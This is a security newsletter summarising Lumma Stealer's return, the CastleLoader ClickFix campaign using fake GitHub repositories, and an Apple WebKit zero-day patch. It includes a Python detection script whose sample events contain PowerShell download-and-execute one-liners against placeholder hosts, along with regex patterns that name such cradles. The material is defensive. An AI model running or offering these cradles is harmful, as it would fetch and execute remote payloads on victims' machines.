
Intel Wrap – July 2025

August 11, 2025
Safe Online

This month focuses on the return of Lumma Stealer, the CastleLoader campaign that uses fake GitHub repositories to infect devices, and an Apple security patch for a flaw that was exploited as a zero-day in Google Chrome.

Lumma Stealer Returns

Lumma Stealer resumed operations just weeks after the FBI disrupted its activities in May 2025, and has since regained pre-takedown targeting levels.

Summary

  • The group now uses more discreet distribution channels and improved evasion methods to avoid detection.
  • Pre-takedown, Lumma relied heavily on Cloudflare to hide malicious domains; post-takedown, reliance has dropped in favor of providers less responsive to law enforcement, such as Russia-based Selectel.
  • Before the disruption, Lumma deployed about 74 new domains weekly, totaling over 3,300 unique C2 domains in a year.
  • Lumma campaigns use cracked software, malicious key generators, compromised websites, and fake browser updates to lure victims.
  • Attackers inject JavaScript into hacked websites to display fake CAPTCHA pages, which lead to malware downloads.
  • Threat actors auto-create GitHub accounts and repositories with AI-generated README files promoting game cheats or exploits that deliver Lumma.
  • YouTube videos with hidden malware in software cracks and Facebook ads linking to malicious sites remain active distribution channels.
  • Lumma has been linked to ransomware, crypto theft, BEC, account hijacking, and cyber-espionage, and is sold as malware-as-a-service to attackers with little technical skill.
  • Organizations should strengthen threat intelligence sharing, train employees to recognize deceptive software and social media threats, and use layered cybersecurity tools for protection.
  • Read more about it here.

CastleLoader Campaign Uses Fake GitHub Repos To Infect Devices

A growing campaign combining ClickFix phishing with the CastleLoader malware has been infecting devices through fake GitHub repositories.

Summary

  • CastleLoader is a newly discovered malware loader used to distribute various information stealers (e.g., DeerStealer, RedLine, StealC) and RATs (e.g., NetSupport RAT, SectopRAT), as well as other loaders such as Hijack Loader.
  • The malware is delivered through Cloudflare-themed ClickFix phishing campaigns and fake GitHub repositories impersonating legitimate applications and tools.
  • Fake domains posing as software libraries, videoconferencing platforms, browser updates, or document verification systems are used to trick victims into running malicious PowerShell commands.
  • The campaign leverages developers’ trust in GitHub by hosting fraudulent repositories that appear reputable, encouraging users to unknowingly install malware.
  • Code injection, runtime unpacking, anti-sandboxing, obfuscation, and modular architecture are some of the tactics employed to hinder detection and analysis.
  • The modular structure of the malware acts as both a delivery mechanism and a staging utility, separating the initial infection from final payload deployment to complicate attribution and incident response.
  • Since May 2025, seven distinct C2 servers have been used, with over 1,634 infection attempts recorded and 469 confirmed compromises (28.7% infection rate).
  • Read more about it here.
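Both the Lumma fake-CAPTCHA pages and the CastleLoader ClickFix lures end the same way: the victim is talked into pasting a PowerShell one-liner that fetches and runs the next stage. The script below is an added example, not code from the original post or from Safe Online, of triaging process-creation telemetry for that pattern. The events are constructed (field names loosely follow Sysmon Event ID 1), the hostnames are placeholders, and the indicator weights and alert threshold are this example's own assumptions rather than a published detection rule.

```python
"""Flag ClickFix-style PowerShell launches in process-creation telemetry."""
import base64
import re

# Constructed sample events (not real telemetry). Hostnames are placeholders.
SAMPLE_EVENTS = [
    {   # user pasted a "verification" command into the Run dialog
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": 'powershell -w hidden -nop -c "irm http://captcha-check.invalid/v | iex"',
    },
    {   # same lure, body hidden behind -EncodedCommand (UTF-16LE, base64)
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell -ep bypass -enc "
                   + base64.b64encode(
                       "iwr http://update-chrome.invalid/x | iex".encode("utf-16-le")
                     ).decode(),
    },
    {   # benign: an admin script run from a scheduled task
        "parent": r"C:\Windows\System32\svchost.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell -File C:\Scripts\rotate-logs.ps1",
    },
    {   # benign: not PowerShell at all
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Program Files\Notepad++\notepad++.exe",
        "cmdline": r'"C:\Program Files\Notepad++\notepad++.exe" notes.txt',
    },
]

# Indicators. Weights and threshold are assumptions made for this example.
INTERACTIVE_PARENTS = ("explorer.exe",)   # Run dialog / desktop shell
EVASION_FLAGS = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|nop|noprofile|ep\s+bypass|executionpolicy\s+bypass)",
    re.I)
ENCODED_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"\b(?:iex|invoke-expression|iwr|irm|invoke-webrequest|invoke-restmethod"
    r"|downloadstring|net\.webclient)\b", re.I)
ALERT_THRESHOLD = 5


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand body, or '' if absent/undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return ""


def score_event(event: dict) -> tuple[int, list[str]]:
    """Score one event; higher means more ClickFix-like. Returns (score, reasons)."""
    image = event["image"].lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return 0, []
    score, reasons = 0, []
    if event["parent"].lower().endswith(INTERACTIVE_PARENTS):
        score += 2
        reasons.append("launched from the interactive shell (Run dialog)")
    cmd = event["cmdline"]
    decoded = decode_encoded_command(cmd)
    if decoded:
        score += 2
        reasons.append("-EncodedCommand present")
    flags = EVASION_FLAGS.findall(cmd)
    if flags:
        score += len(flags)
        reasons.append(f"evasion flags: {flags}")
    # Look for a download-and-execute cradle in both the raw and decoded text.
    cradle = DOWNLOAD_CRADLE.findall(cmd + " " + decoded)
    if cradle:
        score += 3
        reasons.append(f"download cradle: {sorted(set(c.lower() for c in cradle))}")
    return score, reasons


def triage(events: list[dict]) -> list[tuple[int, int, list[str]]]:
    """Return (event index, score, reasons) for events at or above the threshold."""
    hits = []
    for i, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= ALERT_THRESHOLD:
            hits.append((i, score, reasons))
    return hits


if __name__ == "__main__":
    for idx, score, reasons in triage(SAMPLE_EVENTS):
        print(f"event {idx}: score {score}")
        for r in reasons:
            print(f"  - {r}")
```

The parent-process check carries weight because ClickFix lures tell the user to paste into the Run dialog, so the resulting PowerShell process hangs off explorer.exe rather than a script host or scheduler; decoding -EncodedCommand before matching keeps the cradle check from being trivially bypassed by base64. In a real deployment the same logic maps directly onto a SIEM rule over Sysmon Event ID 1 or Windows Security Event 4688 with command-line auditing enabled.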

Apple Patches Safari Vulnerability

Apple has released security updates across all its software platforms to address a high-severity zero-day vulnerability tracked as CVE-2025-6558 (CVSS 8.8).

Summary

  • The flaw, caused by incorrect validation of untrusted input in Chrome’s ANGLE and GPU components, could allow a sandbox escape via crafted HTML pages.
  • The flaw was discovered by Google TAG researchers Clément Lecigne and Vlad Stolyarov, and Google confirmed that an exploit for it is already active in the wild.
  • The issue also affects Apple’s WebKit browser engine, which powers Safari, and could lead to crashes when processing maliciously crafted web content.
  • Due to WebKit’s cross-platform use, the vulnerability impacts iPhones, iPads, Macs, Apple TV, Apple Watch, and Apple Vision Pro, with fixes now available in the latest iOS, iPadOS, macOS, tvOS, watchOS, and visionOS updates.
  • While there’s no evidence of Apple device users being targeted, updating to the latest versions is strongly recommended for maximum protection.
  • Read more about it here.
